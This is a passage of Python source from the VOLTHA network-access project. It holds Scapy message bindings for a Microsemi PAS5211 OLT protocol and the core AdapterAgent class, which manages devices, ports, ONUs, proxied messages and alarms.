if _pkt and len(_pkt) >= 14:
if struct.unpack("!H", _pkt[12:14])[0] <= 1500:
return PAS5211Dot3
return cls
Ether.dispatch_hook = PAS_dispatch_hook
# bindings for messages received
# fix for v2 of Microsemi OLT.
bind_layers(Ether, PAS5211FrameHeader, type=0x0a00)
bind_layers(PAS5211Dot3, PAS5211FrameHeader)
bind_layers(PAS5211FrameHeader, PAS5211MsgHeader)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetProtocolVersion, opcode=0x3000 | 2)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetProtocolVersionResponse, opcode=0x2800 | 2)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetOltVersion, opcode=0x3000 | 3)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetOltVersionResponse, opcode=0x3800 | 3)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOltOptics, opcode=0x3000 | 106)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOltOpticsResponse, opcode=0x2800 | 106)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOpticsIoControl, opcode=0x3000 | 108)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOpticsIoControlResponse, opcode=0x2800 | 108)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetGeneralParam, opcode=0x3000 | 164)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetGeneralParamResponse, opcode=0x2800 | 164)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetGeneralParam, opcode=0x3000 | 165)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetGeneralParamResponse, opcode=0x2800 | 165)
bind_layers(PAS5211MsgHeader, PAS5211MsgAddOltChannel, opcode=0x3000 | 4)
bind_layers(PAS5211MsgHeader, PAS5211MsgAddOltChannelResponse, opcode=0x2800 | 4)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetAlarmConfig, opcode=0x3000 | 48)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetAlarmConfigResponse, opcode=0x2800 | 48)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOltChannelActivationPeriod, opcode=0x3000 | 11)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOltChannelActivationPeriodResponse, opcode=0x2800 | 11)
bind_layers(PAS5211MsgHeader, PAS5211MsgStartDbaAlgorithm, opcode=0x3000 | 55)
bind_layers(PAS5211MsgHeader, PAS5211MsgStartDbaAlgorithmResponse, opcode=0x2800 | 55)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetDbaMode, opcode=0x3000 | 57)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetDbaModeResponse, opcode=0x2800 | 57)
bind_layers(PAS5211MsgHeader, PAS5211MsgSendFrame, opcode=0x3000 | 42)
bind_layers(PAS5211MsgHeader, PAS5211MsgSendFrameResponse, opcode=0x2800 | 42)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetActivationAuthMode, opcode=0x3000 | 145)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetActivationAuthModeResponse, opcode=0x2800 | 145)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOnuOmciPortId, opcode=0x3000 | 41)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOnuOmciPortIdResponse, opcode=0x2800 | 41)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetLogicalObjectStatus, opcode=0x3000 | 223)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetLogicalObjectStatusResponse, opcode=0x2800 | 223)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOnuAllocId, opcode=0x3000 | 8)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetOnuAllocIdResponse, opcode=0x2800 | 8)
bind_layers(PAS5211MsgHeader, PAS5211MsgSendDbaAlgorithmMsg, opcode=0x3000 | 47)
bind_layers(PAS5211MsgHeader, PAS5211MsgSendDbaAlgorithmMsgResponse, opcode=0x2800 | 47)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetPortIdConfig, opcode=0x3000 | 18)
bind_layers(PAS5211MsgHeader, PAS5211MsgSetPortIdConfigResponse, opcode=0x2800 | 18)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetOnuIdByPortId, opcode=0x3000 | 196)
bind_layers(PAS5211MsgHeader, PAS5211MsgGetOnuIdByPortIdResponse, opcode=0x2800 | 196)
bind_layers(PAS5211MsgHeader, PAS5211SetVlanUplinkConfiguration, opcode=0x3000 | 39)
bind_layers(PAS5211MsgHeader, PAS5211SetVlanUplinkConfigurationResponse, opcode=0x2800 | 39)
bind_layers(PAS5211MsgHeader, PAS5211GetOnuAllocs, opcode=0x3000 | 9)
bind_layers(PAS5211MsgHeader, PAS5211GetOnuAllocsResponse, opcode=0x2800 | 9)
bind_layers(PAS5211MsgHeader, PAS5211GetSnInfo, opcode=0x3000 | 7)
bind_layers(PAS5211MsgHeader, PAS5211GetSnInfoResponse, opcode=0x2800 | 7)
bind_layers(PAS5211MsgHeader, PAS5211GetOnusRange, opcode=0x3000 | 116)
bind_layers(PAS5211MsgHeader, PAS5211GetOnusRangeResponse, opcode=0x2800 | 116)
bind_layers(PAS5211MsgHeader, PAS5211GetPortIdConfig, opcode=0x3000 | 19)
bind_layers(PAS5211MsgHeader, PAS5211GetPortIdConfigResponse, opcode=0x2800 | 19)
bind_layers(PAS5211MsgHeader, PAS5211SetSVlanAtConfig, opcode=0x3000 | 63)
bind_layers(PAS5211MsgHeader, PAS5211SetSVlanAtConfigResponse, opcode=0x2800 | 63)
bind_layers(PAS5211MsgHeader, PAS5211SetUplinkVlanHandl, opcode=0x3000 | 34)
bind_layers(PAS5211MsgHeader, PAS5211SetUplinkVlanHandlResponse, opcode=0x2800 | 34)
bind_layers(PAS5211MsgHeader, PAS5211SetVlanGenConfig, opcode=0x3000 | 43)
bind_layers(PAS5211MsgHeader, PAS5211SetVlanGenConfigResponse, opcode=0x2800 | 43)
# bindings for events received
bind_layers(PAS5211MsgHeader, PAS5211EventOnuActivation, opcode=0x2800 | 12, event_type=1)
bind_layers(PAS5211MsgHeader, PAS5211EventFrameReceived, opcode=0x2800 | 12, event_type=10)
bind_layers(PAS5211MsgHeader, PAS5211EventDbaAlgorithm, opcode=0x2800 | 12, event_type=11)
bind_layers(PAS5211MsgHeader, PAS5211Event, opcode=0x2800 | 12)
class Display(object):
def __init__(self, pkts):
self.pkts = pkts
def show(self, seq):
self.pkts[seq].show()
def __getitem__(self, key):
self.show(key)
def walk(self, index=0):
while index < len(self.pkts):
self.show(index)
try:
input("(current packet - %s) Next packet?" % index)
except Exception as e:
pass
index += 1
if __name__ == '__main__':
from scapy.utils import rdpcap
import sys
import code
packets = rdpcap(sys.argv[1])
p = Display(packets)
def walk(index=0):
p.walk(index=index)
code.interact(local=locals())
```
#### File: voltha/core/adapter_agent.py
```python
from uuid import uuid4
import arrow
import structlog
from google.protobuf.json_format import MessageToJson
from scapy.packet import Packet
from twisted.internet.defer import inlineCallbacks, returnValue
from zope.interface import implementer
from common.event_bus import EventBusClient
from common.frameio.frameio import hexify
from common.utils.id_generation import create_cluster_logical_device_ids
from voltha.adapters.interface import IAdapterAgent
from voltha.protos import third_party
from voltha.core.flow_decomposer import OUTPUT
from voltha.protos.device_pb2 import Device, Port, PmConfigs
from voltha.protos.events_pb2 import AlarmEvent, AlarmEventType, \
AlarmEventSeverity, AlarmEventState, AlarmEventCategory
from voltha.protos.events_pb2 import KpiEvent
from voltha.protos.voltha_pb2 import DeviceGroup, LogicalDevice, \
LogicalPort, AdminState, OperStatus, AlarmFilterRuleKey
from voltha.registry import registry
from common.utils.id_generation import create_cluster_device_id
import re
class MacAddressError(BaseException):
def __init__(self, error):
self.error = error
class IDError(BaseException):
def __init__(self, error):
self.error = error
@implementer(IAdapterAgent)
class AdapterAgent(object):
"""
Gate-keeper between CORE and device adapters.
On one side it interacts with Core's internal model and update/dispatch
mechanisms.
On the other side, it interacts with the adapters standard interface as
defined in
"""
def __init__(self, adapter_name, adapter_cls):
self.adapter_name = adapter_name
self.adapter_cls = adapter_cls
self.core = registry('core')
self.adapter = None
self.adapter_node_proxy = None
self.root_proxy = self.core.get_proxy('/')
self._rx_event_subscriptions = {}
self._tx_event_subscriptions = {}
self.event_bus = EventBusClient()
self.packet_out_subscription = None
self.log = structlog.get_logger(adapter_name=adapter_name)
self._onu_detect_event_subscriptions = {}
@inlineCallbacks
def start(self):
self.log.debug('starting')
config = self._get_adapter_config() # this may be None
try:
adapter = self.adapter_cls(self, config)
yield adapter.start()
self.adapter = adapter
self.adapter_node_proxy = self._update_adapter_node()
self._update_device_types()
except Exception, e:
self.log.exception(e)
self.log.info('started')
returnValue(self)
@inlineCallbacks
def stop(self):
self.log.debug('stopping')
if self.adapter is not None:
yield self.adapter.stop()
self.adapter = None
self.log.info('stopped')
def _get_adapter_config(self):
"""
Opportunistically load persisted adapter configuration.
Return None if no configuration exists yet.
"""
proxy = self.core.get_proxy('/')
try:
config = proxy.get('/adapters/' + self.adapter_name)
return config
except KeyError:
return None
def _update_adapter_node(self):
"""
Creates or updates the adapter node object based on self
description from the adapter.
"""
adapter_desc = self.adapter.adapter_descriptor()
assert adapter_desc.id == self.adapter_name
path = self._make_up_to_date(
'/adapters', self.adapter_name, adapter_desc)
return self.core.get_proxy(path)
def _update_device_types(self):
"""
Make sure device types are registered in Core
"""
device_types = self.adapter.device_types()
for device_type in device_types.items:
key = device_type.id
self._make_up_to_date('/device_types', key, device_type)
def _make_up_to_date(self, container_path, key, data):
full_path = container_path + '/' + str(key)
root_proxy = self.core.get_proxy('/')
try:
root_proxy.get(full_path)
root_proxy.update(full_path, data)
except KeyError:
root_proxy.add(container_path, data)
return full_path
def _remove_node(self, container_path, key):
"""
Remove a node from the data model
:param container_path: path to node
:param key: node
:return: None
"""
full_path = container_path + '/' + str(key)
root_proxy = self.core.get_proxy('/')
try:
root_proxy.get(full_path)
root_proxy.remove(full_path)
except KeyError:
# Node does not exist
pass
# ~~~~~~~~~~~~~~~~~~~~~ Core-Facing Service ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def adopt_device(self, device):
return self.adapter.adopt_device(device)
def reconcile_device(self, device):
return self.adapter.reconcile_device(device)
def abandon_device(self, device):
return self.adapter.abandon_device(device)
def disable_device(self, device):
return self.adapter.disable_device(device)
def reenable_device(self, device):
return self.adapter.reenable_device(device)
def reboot_device(self, device):
return self.adapter.reboot_device(device)
def download_image(self, device, request):
return self.adapter.download_image(device, request)
def get_image_download_status(self, device, request):
return self.adapter.get_image_download_status(device, request)
def cancel_image_download(self, device, request):
return self.adapter.cancel_image_download(device, request)
def activate_image_update(self, device, request):
return self.adapter.activate_image_update(device, request)
def revert_image_update(self, device, request):
return self.adapter.revert_image_update(device, request)
def self_test(self, device):
return self.adapter.self_test_device(device)
def delete_device(self, device):
return self.adapter.delete_device(device)
def get_device_details(self, device):
return self.adapter.get_device_details(device)
def update_flows_bulk(self, device, flows, groups):
return self.adapter.update_flows_bulk(device, flows, groups)
def update_flows_incrementally(self, device, flow_changes, group_changes):
return self.update_flows_incrementally(
device, flow_changes, group_changes)
def suppress_alarm(self, filter):
return self.adapter.suppress_alarm(filter)
def unsuppress_alarm(self, filter):
return self.adapter.unsuppress_alarm(filter)
# def update_pm_collection(self, device, pm_collection_config):
# return self.adapter.update_pm_collection(device, pm_collection_config)
def create_interface(self, device, data):
return self.adapter.create_interface(device, data)
def update_interface(self, device, data):
return self.adapter.update_interface(device, data)
def remove_interface(self, device, data):
return self.adapter.remove_interface(device, data)
def create_tcont(self, device, tcont_data, traffic_descriptor_data):
return self.adapter.create_tcont(device, tcont_data,
traffic_descriptor_data)
def update_tcont(self, device, tcont_data, traffic_descriptor_data):
return self.adapter.update_tcont(device, tcont_data,
traffic_descriptor_data)
def remove_tcont(self, device, tcont_data, traffic_descriptor_data):
return self.adapter.remove_tcont(device, tcont_data,
traffic_descriptor_data)
def create_gemport(self, device, data):
return self.adapter.create_gemport(device, data)
def update_gemport(self, device, data):
return self.adapter.update_gemport(device, data)
def remove_gemport(self, device, data):
return self.adapter.remove_gemport(device, data)
def create_multicast_gemport(self, device, data):
return self.adapter.create_multicast_gemport(device, data)
def update_multicast_gemport(self, device, data):
return self.adapter.update_multicast_gemport(device, data)
def remove_multicast_gemport(self, device, data):
return self.adapter.remove_multicast_gemport(device, data)
def create_multicast_distribution_set(self, device, data):
return self.adapter.create_multicast_distribution_set(device, data)
def update_multicast_distribution_set(self, device, data):
return self.adapter.update_multicast_distribution_set(device, data)
def remove_multicast_distribution_set(self, device, data):
return self.adapter.remove_multicast_distribution_set(device, data)
# ~~~~~~~~~~~~~~~~~~~ Adapter-Facing Service ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def get_device(self, device_id):
return self.root_proxy.get('/devices/{}'.format(device_id))
def get_child_device(self, parent_device_id, **kwargs):
"""
Retrieve a child device object belonging
to the specified parent device based on some match
criteria. The first child device that matches the
provided criteria is returned.
:param parent_device_id: parent's device id
:param **kwargs: arbitrary list of match criteria
:return: Child Device Object or None
"""
# Get all arguments to be used for comparison
# Note that for now we are only matching on the ONU ID & SERIAL NUMBER
# Other matching fields can be added as required in the future
onu_id = kwargs.pop('onu_id', None)
serial_number = kwargs.pop('serial_number', None)
if onu_id is None and serial_number is None: return None
# Get all devices
devices = self.root_proxy.get('/devices')
# Get all child devices with the same parent ID
children_ids = set(
d.id for d in devices if d.parent_id == parent_device_id)
# Loop through all the child devices with this parent ID
for child_id in children_ids:
found = True
device = self.get_device(child_id)
# Does this child device match the passed in ONU ID?
found_onu_id = False
if onu_id is not None:
if device.proxy_address.onu_id == onu_id:
found_onu_id = True
# Does this child device match the passed in SERIAL NUMBER?
found_serial_number = False
if serial_number is not None:
if device.serial_number == serial_number:
found_serial_number = True
# Match ONU ID and SERIAL NUMBER
if onu_id is not None and serial_number is not None:
found = found_onu_id & found_serial_number
# Otherwise ONU ID or SERIAL NUMBER
else:
found = found_onu_id | found_serial_number
# Return the matched child device
if found is True:
return device
return None
def add_device(self, device):
assert isinstance(device, Device)
self._make_up_to_date('/devices', device.id, device)
# Ultimately, assign devices to device grpups.
# see https://jira.opencord.org/browse/CORD-838
dg = DeviceGroup(id='1')
self._make_up_to_date('/device_groups', dg.id, dg)
# add device to device group
# see https://jira.opencord.org/browse/CORD-838
def update_device(self, device):
assert isinstance(device, Device)
# we run the update through the device_agent so that the change
# does not loop back to the adapter unnecessarily
device_agent = self.core.get_device_agent(device.id)
device_agent.update_device(device)
def update_device_pm_config(self, device_pm_config, init=False):
assert isinstance(device_pm_config, PmConfigs)
# we run the update through the device_agent so that the change
# does not loop back to the adapter unnecessarily
device_agent = self.core.get_device_agent(device_pm_config.id)
device_agent.update_device_pm_config(device_pm_config, init)
def update_adapter_pm_config(self, device_id, device_pm_config):
device = self.get_device(device_id)
self.adapter.update_pm_config(device, device_pm_config)
def update_image_download(self, img_dnld):
self.log.info('update-image-download', img_dnld=img_dnld)
try:
# we run the update through the device_agent so that the change
# does not loop back to the adapter unnecessarily
device_agent = self.core.get_device_agent(img_dnld.id)
device_agent.update_device_image_download(img_dnld)
except Exception as e:
self.log.exception(e.message)
def delete_image_download(self, img_dnld):
self.log.info('delete-image-download', img_dnld=img_dnld)
try:
root_proxy = self.core.get_proxy('/')
path = '/devices/{}/image_downloads/{}'. \
format(img_dnld.id, img_dnld.name)
root_proxy.get(path)
root_proxy.remove(path)
device_agent = self.core.get_device_agent(img_dnld.id)
device_agent.unregister_device_image_download(img_dnld.name)
except Exception as e:
self.log.exception(e.message)
def _add_peer_reference(self, device_id, port):
# for referential integrity, add/augment references
port.device_id = device_id
me_as_peer = Port.PeerPort(device_id=device_id, port_no=port.port_no)
for peer in port.peers:
peer_port_path = '/devices/{}/ports/{}'.format(
peer.device_id, peer.port_no)
peer_port = self.root_proxy.get(peer_port_path)
if me_as_peer not in peer_port.peers:
new = peer_port.peers.add()
new.CopyFrom(me_as_peer)
self.root_proxy.update(peer_port_path, peer_port)
def _del_peer_reference(self, device_id, port):
me_as_peer = Port.PeerPort(device_id=device_id, port_no=port.port_no)
for peer in port.peers:
peer_port_path = '/devices/{}/ports/{}'.format(
peer.device_id, peer.port_no)
peer_port = self.root_proxy.get(peer_port_path)
if me_as_peer in peer_port.peers:
peer_port.peers.remove(me_as_peer)
self.root_proxy.update(peer_port_path, peer_port)
def add_port(self, device_id, port):
assert isinstance(port, Port)
# for referential integrity, add/augment references
self._add_peer_reference(device_id, port)
# Add port
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def get_ports(self, device_id, port_type):
# assert Port.PortType.DESCRIPTOR.values_by_name[port_type]
ports = self.root_proxy.get('/devices/{}/ports'.format(device_id))
return [p for p in ports if p.type == port_type]
def delete_port(self, device_id, port):
assert isinstance(port, Port)
# for referential integrity, add/augment references
self._del_peer_reference(device_id, port)
# Delete port
self._remove_node('/devices/{}/ports'.format(device_id), port.port_no)
def disable_all_ports(self, device_id):
"""
Disable all ports on that device, i.e. change the admin status to
disable and operational status to UNKNOWN.
:param device_id: device id
:return: None
"""
# get all device ports
ports = self.root_proxy.get('/devices/{}/ports'.format(device_id))
for port in ports:
port.admin_state = AdminState.DISABLED
port.oper_status = OperStatus.UNKNOWN
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def enable_all_ports(self, device_id):
"""
Re-enable all ports on that device, i.e. change the admin status to
enabled and operational status to ACTIVE
:param device_id: device id
:return: None
"""
# get all device ports
ports = self.root_proxy.get('/devices/{}/ports'.format(device_id))
for port in ports:
port.admin_state = AdminState.ENABLED
port.oper_status = OperStatus.ACTIVE
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def update_operstatus_all_ports(self, device_id, oper_status):
ports = self.root_proxy.get('/devices/{}/ports'.format(device_id))
for port in ports:
port.oper_status = oper_status
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def delete_all_peer_references(self, device_id):
"""
Remove all peer port references for that device
:param device_id: device_id of device
:return: None
"""
ports = self.root_proxy.get('/devices/{}/ports'.format(device_id))
for port in ports:
port_path = '/devices/{}/ports/{}'.format(device_id, port.port_no)
for peer in port.peers:
port.peers.remove(peer)
self.root_proxy.update(port_path, port)
def delete_port_reference_from_parent(self, device_id, port):
"""
Delete the port reference from the parent device
:param device_id: id of device containing the port
:param port: port to remove
:return: None
"""
assert isinstance(port, Port)
self.log.info('delete-port-reference', device_id=device_id, port=port)
self._del_peer_reference(device_id, port)
# update child port details
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def add_port_reference_to_parent(self, device_id, port):
"""
Add the port reference to the parent device
:param device_id: id of device containing the port
:param port: port to add
:return: None
"""
assert isinstance(port, Port)
self.log.info('add-port-reference', device_id=device_id, port=port)
self._add_peer_reference(device_id, port)
# update child port details
self._make_up_to_date('/devices/{}/ports'.format(device_id),
port.port_no, port)
def get_logical_device(self, logical_device_id):
return self.root_proxy.get('/logical_devices/{}'.format(
logical_device_id))
def get_logical_port(self, logical_device_id, port_id):
return self.root_proxy.get('/logical_devices/{}/ports/{}'.format(
logical_device_id, port_id))
def _create_cluster_ids_from_dpid(self, dpid):
"""
Create a logical device id using a datapath id.
:param dpid: Must be present and formatted as a mac address
:return: a unique logical device id and a formatted datapath id. If
the dpid was already registered then an exception will be raised.
"""
switch_id = int(dpid.replace(':', ''), 16)
logical_devices = self.root_proxy.get('/logical_devices')
existing_ids = set(ld.id for ld in logical_devices)
existing_datapath_ids = set(ld.datapath_id for ld in logical_devices)
core_id = registry('core').core_store_id
ld_id, dp_id = create_cluster_logical_device_ids(core_id, switch_id)
ids_exist = dp_id in existing_datapath_ids or \
ld_id in existing_ids
if not ids_exist:
return ld_id, dp_id
else:
self.log.error('ID-already-registered', logical_id=ld_id,
dpid=dpid)
raise IDError('ID-already-registered')
def _is_valid_mac_address(self, data):
return re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$",
data)
def create_logical_device(self, logical_device, dpid=None):
"""
Allow the adapters to provide their own datapath id. This must
be the OLT MAC address. If the dpid is None or is not a mac
address then an exception will be raised.
:param logical_device: logical device
:param dpid: OLT MAC address. dpid default param is None just to be
backward compatible with existing adapters.
:return: updated logical device
"""
assert isinstance(logical_device, LogicalDevice)
# Validate the dpid - it needs to be present and formatted as a mac
# address
if dpid:
dpid = dpid.lower()
if not self._is_valid_mac_address(dpid):
self.log.error('DPID-not-a-mac-address', dpid=dpid)
raise MacAddressError('DPID-not-a-mac-address')
else:
self.log.error('DPID-cannot-be-none')
raise MacAddressError("DPID-cannot-be-none")
if not logical_device.id:
ld_id, dp_id = self._create_cluster_ids_from_dpid(dpid)
logical_device.id = ld_id
logical_device.datapath_id = dp_id
self._make_up_to_date('/logical_devices',
logical_device.id, logical_device)
# Keep a reference to the packet out subscription as it will be
# referred during removal
self.packet_out_subscription = self.event_bus.subscribe(
topic='packet-out:{}'.format(logical_device.id),
callback=lambda _, p: self.receive_packet_out(logical_device.id, p)
)
return logical_device
def reconcile_logical_device(self, logical_device_id):
"""
This is called by the adapter to reconcile the physical device with
the logical device. For now, we only set the packet-out subscription
:param logical_device_id:
:return:
"""
# Keep a reference to the packet out subscription as it will be
# referred during removal
self.packet_out_subscription = self.event_bus.subscribe(
topic='packet-out:{}'.format(logical_device_id),
callback=lambda _, p: self.receive_packet_out(logical_device_id, p)
)
def delete_logical_device(self, logical_device):
"""
This will remove the logical device as well as all logical ports
associated with it
:param logical_device: The logical device to remove
:return: None
"""
assert isinstance(logical_device, LogicalDevice)
# Remove packet out subscription
self.event_bus.unsubscribe(self.packet_out_subscription)
# Remove node from the data model - this will trigger the logical
# device 'remove callbacks' as well as logical ports 'remove
# callbacks' if present
self._remove_node('/logical_devices', logical_device.id)
def receive_packet_out(self, logical_device_id, ofp_packet_out):
def get_port_out(opo):
for action in opo.actions:
if action.type == OUTPUT:
return action.output.port
out_port = get_port_out(ofp_packet_out)
frame = ofp_packet_out.data
self.adapter.receive_packet_out(logical_device_id, out_port, frame)
def add_logical_port(self, logical_device_id, port):
assert isinstance(port, LogicalPort)
self._make_up_to_date(
'/logical_devices/{}/ports'.format(logical_device_id),
port.id, port)
def delete_logical_port(self, logical_device_id, port):
assert isinstance(port, LogicalPort)
self._remove_node('/logical_devices/{}/ports'.format(
logical_device_id), port.id)
def delete_logical_port_by_id(self, logical_device_id, port_id):
self._remove_node('/logical_devices/{}/ports'.format(
logical_device_id), port_id)
def update_logical_port(self, logical_device_id, port):
assert isinstance(port, LogicalPort)
self.log.debug('update-logical-port',
logical_device_id=logical_device_id,
port=port)
self._make_up_to_date(
'/logical_devices/{}/ports'.format(logical_device_id),
port.id, port)
def get_child_devices(self, parent_device_id):
try:
devices = self.root_proxy.get('/devices')
children = [d for d in devices if d.parent_id == parent_device_id]
return children
except Exception, e:
self.log.exception('failure', e=e)
def subscribe_to_proxy_child_messages(self, proxy_address):
topic = self._gen_tx_proxy_address_topic(proxy_address)
self._tx_event_subscriptions[topic] = self.event_bus.subscribe(
topic, lambda t, m: self._send_proxied_message(proxy_address, m))
def reconcile_child_devices(self, parent_device_id):
children = self.get_child_devices(parent_device_id)
for child in children:
# First subscribe to proxy messages from a chile device
self.subscribe_to_proxy_child_messages(child.proxy_address)
# Then trigger the reconciliation of the existing child device
device_agent = self.core.get_device_agent(child.id)
device_agent.reconcile_existing_device(child)
# Obselete API - discouraged to be decommissioned after
# adapters are align to new APIs
def child_device_detected(self,
parent_device_id,
parent_port_no,
child_device_type,
proxy_address,
admin_state,
**kw):
# we create new ONU device objects and insert them into the config
device = Device(
id=create_cluster_device_id(self.core.core_store_id),
# id=uuid4().hex[:12],
type=child_device_type,
parent_id=parent_device_id,
parent_port_no=parent_port_no,
proxy_address=proxy_address,
admin_state=admin_state,
**kw
)
self._make_up_to_date(
'/devices', device.id, device)
topic = self._gen_tx_proxy_address_topic(proxy_address)
self._tx_event_subscriptions[topic] = self.event_bus.subscribe(
topic, lambda t, m: self._send_proxied_message(proxy_address, m))
def add_onu_device(self,
parent_device_id,
parent_port_no,
vendor_id,
proxy_address,
admin_state,
**kw):
device_type = next((dt for dt in self.root_proxy.get('/device_types')
if dt.vendor_id == vendor_id and \
dt.id.endswith("_onu")), None)
# we create new ONU device objects and insert them into the config
device = Device(
id=create_cluster_device_id(self.core.core_store_id),
# id=uuid4().hex[:12],
type=device_type.id,
vendor_id=vendor_id,
parent_id=parent_device_id,
parent_port_no=parent_port_no,
proxy_address=proxy_address,
admin_state=admin_state,
adapter=device_type.adapter,
**kw
)
self._make_up_to_date('/devices', device.id, device)
topic = self._gen_tx_proxy_address_topic(proxy_address)
self._tx_event_subscriptions[topic] = self.event_bus.subscribe(
topic, lambda t, m: self._send_proxied_message(proxy_address, m))
def get_child_device_with_proxy_address(self, proxy_address):
# Proxy address is defined as {parent id, channel_id}
devices = self.root_proxy.get('/devices')
children_ids = set(d.id for d in devices if d.parent_id ==
proxy_address.device_id)
for child_id in children_ids:
device = self.get_device(child_id)
if device.proxy_address == proxy_address:
return device
def remove_all_logical_ports(self, logical_device_id):
""" Remove all logical ports from a given logical device"""
ports = self.root_proxy.get('/logical_devices/{}/ports')
for port in ports:
self._remove_node('/logical_devices/{}/ports', port.id)
def delete_all_child_devices(self, parent_device_id):
""" Remove all ONUs from a given OLT """
devices = self.root_proxy.get('/devices')
children_ids = set()
for device in devices:
if device.parent_id == parent_device_id:
children_ids.add(device.id)
topic = self._gen_tx_proxy_address_topic(device.proxy_address)
self.event_bus.unsubscribe(self._tx_event_subscriptions[topic])
del self._tx_event_subscriptions[topic]
self.log.debug('devices-to-delete',
parent_id=parent_device_id,
children_ids=children_ids)
for child_id in children_ids:
self._remove_node('/devices', child_id)
def update_child_devices_state(self,
parent_device_id,
oper_status=None,
connect_status=None,
admin_state=None):
""" Update status of all child devices """
devices = self.root_proxy.get('/devices')
children_ids = set(
d.id for d in devices if d.parent_id == parent_device_id)
self.log.debug('update-devices',
parent_id=parent_device_id,
children_ids=children_ids,
oper_status=oper_status,
connect_status=connect_status,
admin_state=admin_state)
for child_id in children_ids:
device = self.get_device(child_id)
if oper_status is not None:
device.oper_status = oper_status
if connect_status:
device.connect_status = connect_status
if admin_state:
device.admin_state = admin_state
self._make_up_to_date(
'/devices', device.id, device)
def delete_child_device(self, parent_device_id, child_device_id):
onu_device = self.root_proxy.get('/devices/{}'.format(child_device_id))
if onu_device is not None:
if onu_device.parent_id == parent_device_id:
self.log.debug('deleting-child-device',
parent_device_id=parent_device_id,
child_device_id=child_device_id)
topic = self._gen_tx_proxy_address_topic(
onu_device.proxy_address)
self.event_bus.unsubscribe(self._tx_event_subscriptions[topic])
del self._tx_event_subscriptions[topic]
self._remove_node('/devices', child_device_id)
def _gen_rx_proxy_address_topic(self, proxy_address):
"""Generate unique topic name specific to this proxy address for rx"""
topic = 'rx:' + MessageToJson(proxy_address)
return topic
def _gen_tx_proxy_address_topic(self, proxy_address):
"""Generate unique topic name specific to this proxy address for tx"""
topic = 'tx:' + MessageToJson(proxy_address)
return topic
def register_for_proxied_messages(self, proxy_address):
topic = self._gen_rx_proxy_address_topic(proxy_address)
self._rx_event_subscriptions[topic] = self.event_bus.subscribe(
topic,
lambda t, m: self._receive_proxied_message(proxy_address, m))
def unregister_for_proxied_messages(self, proxy_address):
topic = self._gen_rx_proxy_address_topic(proxy_address)
self.event_bus.unsubscribe(self._rx_event_subscriptions[topic])
del self._rx_event_subscriptions[topic]
def _receive_proxied_message(self, proxy_address, msg):
self.adapter.receive_proxied_message(proxy_address, msg)
def send_proxied_message(self, proxy_address, msg):
topic = self._gen_tx_proxy_address_topic(proxy_address)
self.event_bus.publish(topic, msg)
def _send_proxied_message(self, proxy_address, msg):
self.adapter.send_proxied_message(proxy_address, msg)
def receive_proxied_message(self, proxy_address, msg):
topic = self._gen_rx_proxy_address_topic(proxy_address)
self.event_bus.publish(topic, msg)
def register_for_inter_adapter_messages(self):
self.event_bus.subscribe(self.adapter_name,
lambda t,
m: self.adapter.receive_inter_adapter_message(
m))
def unregister_for_inter_adapter_messages(self):
self.event_bus.unsubscribe(self.adapter_name)
def publish_inter_adapter_message(self, device_id, msg):
# Get the device from the device_id
device = self.get_device(device_id)
assert device is not None
# Publish a message to the adapter that is responsible
# for managing this device
self.event_bus.publish(device.type, msg)
# ~~~~~~~~~~~~~~~~~~ Handling packet-in and packet-out ~~~~~~~~~~~~~~~~~~~~
def send_packet_in(self, logical_device_id, logical_port_no, packet):
self.log.debug('send-packet-in', logical_device_id=logical_device_id,
logical_port_no=logical_port_no, packet=hexify(packet))
if isinstance(packet, Packet):
packet = str(packet)
topic = 'packet-in:' + logical_device_id
self.event_bus.publish(topic, (logical_port_no, packet))
# ~~~~~~~~~~~~~~~~~~~ Handling KPI metric submissions ~~~~~~~~~~~~~~~~~~~~~
def submit_kpis(self, kpi_event_msg):
try:
assert isinstance(kpi_event_msg, KpiEvent)
self.event_bus.publish('kpis', kpi_event_msg)
except Exception as e:
self.log.exception('failed-kpi-submission',
type=type(kpi_event_msg))
# ~~~~~~~~~~~~~~~~~~~ Handle alarm submissions ~~~~~~~~~~~~~~~~~~~~~
def create_alarm(self, id=None, resource_id=None, description=None,
raised_ts=0, changed_ts=0,
type=AlarmEventType.EQUIPMENT,
category=AlarmEventCategory.PON,
severity=AlarmEventSeverity.MINOR,
state=AlarmEventState.RAISED,
context=None):
# Construct the ID if it is not provided
if id == None:
id = 'voltha.{}.{}'.format(self.adapter_name, resource_id)
return AlarmEvent(
id=id,
resource_id=resource_id,
type=type,
category=category,
severity=severity,
state=state,
description=description,
reported_ts=arrow.utcnow().timestamp,
raised_ts=raised_ts,
